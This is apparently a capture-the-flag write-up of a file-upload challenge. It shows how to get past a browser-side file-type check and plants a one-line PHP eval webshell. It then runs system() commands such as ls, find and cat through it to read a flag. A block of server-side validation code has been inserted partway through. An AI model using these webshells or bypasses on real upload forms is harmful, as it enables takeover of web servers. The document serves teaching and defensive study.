Open the challenge address:
It is a file upload challenge.
Select a one-sentence webshell to upload:
The front end has JS code that checks the file type: if the suffix of the uploaded file is not jpg or png, the upload button is disabled:
To bypass the front-end JS check, the common methods are:
Method 1: remove onchange="check();" directly, so that the file type is not checked when the file is selected.
Press F12 to view the page source:
Delete onchange="check();":
After choosing the 1.php file, the suffix was still checked and the upload button became disabled:
But in Firefox, after deleting onchange="check();", the 1.php file can be selected:
Click to upload:
Uploaded successfully!
So in Chrome the whole JS code may need to be deleted; then we simply choose the 1.php file:
Remove the disabled attribute of the upload button:
After that, the upload button becomes enabled; upload 1.php:
Uploaded successfully!
Method 2: disable JavaScript in the browser, so that the file type is not checked when the file is submitted.
For example in Chrome: Settings -> Privacy and security -> JavaScript, or enter the URL directly:
chrome://settings/content/javascript
Temporarily set "Don't allow sites to use JavaScript" for all websites, or add the target URL so that it cannot execute JavaScript.
Select 1.php:
Without the JS script, the upload button stays enabled and you can upload directly:
Uploaded successfully!
Method 3: first select 11.jpg and upload it from the browser, then capture the request with Burp Suite:
Then send it to Repeater, change 11.jpg back to 11.php, and send:
It can also be uploaded successfully.
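All three bypasses above work because the only check runs in the browser. The following is an added example, not code from the writeup or the challenge, of the server-side validation an upload handler should perform instead: an extension allowlist, a magic-byte check that must agree with the extension, and a server-generated filename. The function names and the sample byte strings are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Added example (not part of the original writeup): server-side upload validation.
// Allowed extensions and the image type their contents must sniff as.
const ALLOWED_EXT = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png'];

/** Detect the image type from the file's leading bytes, or null if not a known image. */
function sniff_image_type(string $bytes): ?string {
    if (strncmp($bytes, "\xFF\xD8\xFF", 3) === 0) {
        return 'image/jpeg';
    }
    if (strncmp($bytes, "\x89PNG\r\n\x1A\n", 8) === 0) {
        return 'image/png';
    }
    return null;
}

/**
 * Validate an upload from the client-supplied name and the file contents.
 * Returns [true, storedName] on success or [false, reason] on rejection.
 * The client's Content-Type header and any front-end check are ignored entirely.
 */
function validate_upload(string $clientName, string $bytes): array {
    // Only the last suffix counts, lowercased, and it must be on the allowlist.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_EXT[$ext])) {
        return [false, "extension '$ext' is not allowed"];
    }
    // Renaming 11.jpg to 11.php in a proxy fails above; a .jpg that is not
    // really an image (or is a PNG with a .jpg name) fails here.
    $type = sniff_image_type($bytes);
    if ($type === null || $type !== ALLOWED_EXT[$ext]) {
        return [false, "content is not a valid $ext image"];
    }
    // Never reuse the client's name: the stored name is random and keeps only
    // the validated extension, so no user-chosen .php name can reach the disk.
    $storedName = bin2hex(random_bytes(16)) . '.' . $ext;
    return [true, $storedName];
}

// Constructed sample inputs (not real files from the challenge):
$pngBytes = "\x89PNG\r\n\x1A\n" . str_repeat("\0", 16);
var_dump(validate_upload('11.png', $pngBytes));           // [true, "<random>.png"]
var_dump(validate_upload('11.jpg', $pngBytes));           // [false, ...] PNG bytes, jpg name
var_dump(validate_upload('1.php', "<?php echo 1; ?>"));   // [false, ...] extension rejected
var_dump(validate_upload('x.php.jpg', "<?php echo 1; ?>")); // [false, ...] not an image
```

Validation alone is not enough: the upload directory should also be outside the web root or configured so the PHP interpreter never executes files stored there, otherwise a single missed case still yields a webshell.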
<?php @eval($_POST['attack']); ?>
The principle of the one-sentence webshell: the value of the attack variable submitted via POST is passed to PHP's eval() function, so attack=xxx runs the string xxx as a PHP statement. attack here is only a variable name and can be changed to anything else.
This webshell needs the value of the attack variable to be submitted in a POST request:
attack=phpinfo();
phpinfo() outputs a large amount of information about the current state of PHP, including the PHP compile options, enabled extensions, PHP version, server information and environment (if compiled as a module), the PHP environment, operating system version information, paths, local and master values of configuration options, HTTP headers, and the PHP license.
Next, we can execute a command to list the files in the current directory:
attack=system('ls');
Then search for flag files:
attack=system('find / -name "flag*" ');
The flag is found at /var/www/html/flag.php:
View the flag file:
attack=system('cat /var/www/html/flag.php');
The content of flag.php is returned in a comment, and we get the flag: cyberpeace{96e8b99eee701e52288e986eb8ea3f2c}
<?php @eval($_GET['attack']); ?>
The one-sentence webshell can also receive the value of the attack variable via GET.
Upload it as 2.php.
Then connect:
http://111.200.241.244:54118/upload/1637599461.2.php?attack=system('cat /var/www/html/flag.php');
Get the flag: cyberpeace{96e8b99eee701e52288e986eb8ea3f2c}
In addition, you can also connect with AntSword:
<?php @eval($_POST['attack']); ?>
Connect using the first webshell, the POST version:
Then you can use the virtual terminal, browse the file manager, perform database operations, etc.:
Find flag.php:
Get the flag: cyberpeace{96e8b99eee701e52288e986eb8ea3f2c}